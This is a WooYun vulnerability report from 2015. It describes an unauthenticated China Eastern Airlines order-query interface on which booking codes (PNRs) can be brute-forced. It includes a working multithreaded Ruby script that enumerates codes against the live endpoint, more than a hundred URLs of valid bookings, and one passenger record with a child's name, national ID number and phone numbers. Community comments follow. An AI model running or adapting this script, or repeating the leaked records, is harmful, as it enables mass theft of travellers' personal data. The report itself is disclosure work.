当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100000

漏洞标题:东方航空某接口未授权访问及PNR码与客票号码设计缺陷可导致大量航空订单信息泄漏(含姓名 航班 目的地 身份证号 手机号等)

相关厂商:中国东方航空股份有限公司

漏洞作者: 北京方便面

提交时间:2015-03-07 13:50

修复时间:2015-04-21 13:52

公开时间:2015-04-21 13:52

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-07: 细节已通知厂商并且等待厂商处理中
2015-03-07: 厂商已经确认,细节仅向厂商公开
2015-03-17: 细节向核心白帽子及相关领域专家公开
2015-03-27: 细节向普通白帽子公开
2015-04-06: 细节向实习白帽子公开
2015-04-21: 细节向公众公开

简要描述:

PNR是旅客订座记录,即Passenger Name Record的缩写,它反映了旅客的航程,航班座位占用的数量,及旅客信息。适用民航订座系统。
该接口多家航空公司适用 海南航空、联合航空、上海航空等等
包含姓名 航班 目的地 身份证号 手机号等信息
提供大量未起飞订单信息证明

详细说明:

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCXV83
该接口可未授权访问
PNR码由大于等于5 小于等于10的数字字母随机组成
为较为常见的为6位数字字母组成
而由于机票的基数还是相当大的 我们采用碰撞方式还是能获取大量PNR码的
有了PNR码 我们就可以查看他人的订票信息
例如:

1.张婧萌 MFJDWN
 2.  KN5927 V   SA21MAR  NAYXMN RR1   0710 0955      E --T4
 3.T SHA/SHA/T-021-34064880-454360/SHA HUA CHENG SOUTHWEST TRA
 4.T SHA/VEL/SHAO/JI HONG
 5.SSR FOID KN HK1 NI110108201111068247/P1
 6.SSR TKNE KN HK1 NAYXMN 5927 V21MAR 7818581172025/1/P1
 7.SSR CHLD KN HK1 06NOV11/P1
 8.OSI CA CTC 021-51069999X454360
 9.OSI KN CTCT18918086637
10.OSI CA TKNA TICTKED
11.PEK1E/JQ2DJ8/SHA717


这里包含了姓名 航班 身份证号 手机号等个人信息
附脚本:

# encoding: utf-8
require "rubygems"
require 'net/http'
require 'open-uri'
def makefile(file,string)
  directory = "#{Dir.pwd}"
  FileUtils.mkdir(directory)  unless File.directory?(directory)
  f = File.open("#{directory}/#{file}","a")
  f.puts string
  f.close
end  
def get_url(url)
	params = {}  
    params["name"] = 'Tom'  
	url = URI.parse(url)
	http      = Net::HTTP.new(url.host, url.port)
	resp      = http.get(url)	
end
threads=[]
    20.times {
    threads << Thread.new{
	10000000.times { |x|
		#puts x
		arr  = (0..9).to_a+('A'..'Z').to_a
        arr2 =('M'..'N').to_a
        pnr1 = arr2.sample(1).join("")
		pnr2  = arr.sample(5).join("")
		#pnr='MTDFEM'
        pnr=pnr1+pnr2
		#pnr= 'NGSR2E'
		#url = "http://scb2b.travelsky.com/scetb2b/b2b/orderquery/pnrdisplay.jsp?pnrno=#{pnr}"
		url = "http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=#{pnr}"
		puts pnr
		resp = get_url(url)
		#puts resp.code
		response = resp.body.force_encoding('UTF-8')
		#response = resp.body.force_encoding('gb2312')
		if response =~ /CTC/
		  puts url
		  makefile("log.txt",url)
		end 
		}
		}
}
  threads.each{|t| t.join}


电子票号:
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=2&queryText=784-2168259211
电子票号可遍历

漏洞证明:

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTDFEM
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJSGQ5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML8X9B
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWQYJ4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEHYG1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME6WFM
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MY8XTK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NT8MFX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCXV83
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ0LPQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT958B
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NF3BQN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15R7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFJDWN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZTHPX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY7JHV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBE5DT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCX275
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15S7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML0926
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NT7ZJD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE315G
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK5RFY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZM64E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME8T06
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MHPMZ9
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NV0XM1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MDV6N7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MD3Z26
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MYF63Q
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXMJGD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXEGC7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXCM1E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWF5NL
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJD6H4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NG2SCZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ8YWG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NDB7GV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJYWDN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MLS4PQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZK6FN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT46QL
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFVRNK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJP0ZB
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBP8LJ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ51YW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MWH7KS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVNQJT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBTYLP
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKC6Z8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME8ZB9
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NEDPRZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVL9JF
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MG9XWT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLSF96
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTZV04
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZPE9T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MX3Z7W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBW7HR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MC89MS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MDHX5T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJP81X
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGVXW6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZWSR2
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTX1RV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKCVN6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MG2E3W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NVNG3J
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXNJTW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE7R1L
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWF3XC
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZCM08
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK19HR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB74GE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK69CD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTR4SV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NC84Y2
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJLH21
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NHXJGR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MX6FL5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZY7QR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NHKY2E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB68L1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MKW016
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEC9PR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCV5F8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGENV4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGK2R3
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NV6PDZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZW6JD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MW8PSG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLVJDT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NL3Z78
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFPDRQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NVL5Q3
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ906D
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZJ37C
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGWQ5Z
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLECJK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEGHCD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVYFZ5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MW5871
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT09QG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NB3DXQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGWX7V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJEZQS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBE6NX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZ2KYN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBGR4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML0FZ7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJQCS6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NFH0JS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NYE8CQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZQWX6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME3281
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ND1R8W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBK43V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCP32H
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY3E7K
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTVJMY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NH3VGR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKZP30
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJEWT6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVWNT7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZL6E4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXMHFD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB7NSW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVLF3P
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGBJ6N
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCBYGX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NB1L4F
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXRYWK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY1BEK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXLGB1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTQXYE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBYR8V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLZPSE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJLSEY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTQR6H
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBQVER
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK7BJW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCND4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZVQN4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBYZET
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NH0F16
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCHV6Q
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NW59RV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MK8LVY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJF3N4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MKM84T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTDWF8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVNS4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME4RN1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVR5JE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ69HZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MK1ZQR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MLCR20
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MHD1TW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJZ0NT


屏幕快照 2015-03-07 下午1.10.34.png


屏幕快照 2015-03-07 下午12.59.46.png


屏幕快照 2015-03-07 下午1.00.00.png


屏幕快照 2015-03-07 下午1.00.08.png


屏幕快照 2015-03-07 下午1.00.19.png


屏幕快照 2015-03-07 下午1.00.26.png


屏幕快照 2015-03-07 下午1.00.40.png


http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT958B

屏幕快照 2015-03-07 下午1.02.18.png


http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ0LPQ

屏幕快照 2015-03-07 下午1.02.55.png


http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15R7

屏幕快照 2015-03-07 下午1.03.49.png

修复方案:

版权声明:转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-07 22:02

厂商回复:

十分感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-07 13:53 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    ID:10W是个印记

  2. 2015-03-07 13:57 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    10W留名!

  3. 2015-03-07 13:58 | sdc1992 ( 实习白帽子 | Rank:32 漏洞数:12 )

    10W留名!

  4. 2015-03-07 13:58 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    10W留名!

  5. 2015-03-07 13:58 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    10W留名!

  6. 2015-03-07 13:58 | Noxxx ( 普通白帽子 | Rank:509 漏洞数:41 )

    10W留名!

  7. 2015-03-07 13:59 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这个时候是不是该出现『恭喜洞主获取10w现金大奖,请拨打电话010-88888888领取奖励』

  8. 2015-03-07 14:28 | 红客十年 ( 普通白帽子 | Rank:334 漏洞数:63 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    坐等打雷

  9. 2015-03-07 14:47 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    10W留名

  10. 2015-03-07 15:23 | 蓝哆 ( 实习白帽子 | Rank:84 漏洞数:12 | 尽我所能,改变互联网的明天~ 我是作死哆)

    留名!!!!!!!!

  11. 2015-03-07 16:18 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    据说第10W要被封号

  12. 2015-03-07 16:25 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    10W留名!

  13. 2015-03-07 16:53 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    @疯狗 @Finger 已经拨打 奖励呢?

  14. 2015-03-07 17:10 | 哆嗦春梦 ( 路人 | Rank:4 漏洞数:2 | 一个喜欢做春梦的人)

    屌爆了啊。。。受不鸟啊。。

  15. 2015-03-07 17:18 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    卧槽,又是打雷

  16. 2015-03-07 17:35 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    666

  17. 2015-03-07 18:05 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    10.

  18. 2015-03-07 18:25 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    100000

  19. 2015-03-07 18:28 | 蜉蝣 ( 实习白帽子 | Rank:93 漏洞数:24 )

    100000

  20. 2015-03-07 18:35 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    10万刘明

  21. 2015-03-07 18:36 | 天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)

    10W留名!

  22. 2015-03-07 18:44 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    10W留名!

  23. 2015-03-07 19:02 | huc-ray ( 路人 | Rank:25 漏洞数:7 | 菜鸟一枚)

    10W留名

  24. 2015-03-07 19:30 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络!)

    10W留名!

  25. 2015-03-07 19:35 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    10W。。。。

  26. 2015-03-07 21:52 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    10W留名!

  27. 2015-03-07 22:09 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    10W里程碑,mark

  28. 2015-03-07 22:34 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    10W留名!

  29. 2015-03-08 02:46 | 老阎 ( 路人 | Rank:5 漏洞数:2 | 求师傅带)

    10W留名

  30. 2015-04-21 14:51 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    掉渣天盘

  31. 2015-04-21 15:46 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    身份证等信息没看见..

  32. 2015-04-21 15:54 | 大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)

    10W留名

  33. 2015-04-21 16:28 | 开心一下1313 ( 实习白帽子 | Rank:63 漏洞数:20 | 喝口水,压压惊......)

    简直不能再叼了!

  34. 2015-06-02 11:18 | ( 路人 | Rank:0 漏洞数:1 | 风中追风的一匹狼)

    10万!留名~